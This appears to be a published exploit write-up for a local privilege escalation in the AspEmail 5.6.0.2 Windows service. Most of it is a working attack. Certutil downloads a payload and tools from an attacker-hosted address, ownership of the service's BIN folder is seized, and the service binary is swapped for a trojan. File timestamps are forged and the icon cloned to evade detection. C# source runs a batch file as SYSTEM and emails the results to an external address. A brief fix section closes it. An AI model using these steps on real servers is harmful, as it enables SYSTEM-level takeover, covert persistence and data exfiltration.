Below is a copy: AspEmail v5.6.0.2 Local Privilege Escalation
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [[email protected]] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("[email protected]"); #
mail.To.Add("[email protected]"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum